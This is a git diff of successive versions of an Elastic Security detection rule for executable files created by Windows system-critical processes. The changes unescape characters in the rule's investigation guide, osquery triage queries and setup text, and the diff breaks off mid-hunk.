diff --git a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_106.json b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_106.json
index 0024671844e..43b37346ab9 100644
--- a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_106.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Executable File Creation by a System Critical Process", - "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"exe\", \"dll\") and\n process.name : (\"smss.exe\",\n \"autochk.exe\",\n \"csrss.exe\",\n \"wininit.exe\",\n \"services.exe\",\n \"lsass.exe\",\n \"winlogon.exe\",\n \"userinit.exe\",\n \"LogonUI.exe\")\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_107.json b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_107.json index e3694e14c84..eac01997354 100644 
--- a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_107.json +++ b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_107.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Executable File Creation by a System Critical Process", - "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"exe\", \"dll\") and\n process.name : (\"smss.exe\",\n \"autochk.exe\",\n \"csrss.exe\",\n \"wininit.exe\",\n \"services.exe\",\n \"lsass.exe\",\n \"winlogon.exe\",\n \"userinit.exe\",\n \"LogonUI.exe\")\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_108.json b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_108.json index 7f61a6178eb..cd04391bfe3 100644 
--- a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_108.json +++ b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_108.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Executable File Creation by a System Critical Process", - "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"exe\", \"dll\") and\n process.name : (\"smss.exe\",\n \"autochk.exe\",\n \"csrss.exe\",\n \"wininit.exe\",\n \"services.exe\",\n \"lsass.exe\",\n \"winlogon.exe\",\n \"userinit.exe\",\n \"LogonUI.exe\")\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
diff --git a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_109.json b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_109.json index 9b4471430b7..49ec3899690 100644 --- a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_109.json +++ b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_109.json 
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Unusual Executable File Creation by a System Critical Process",
- "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
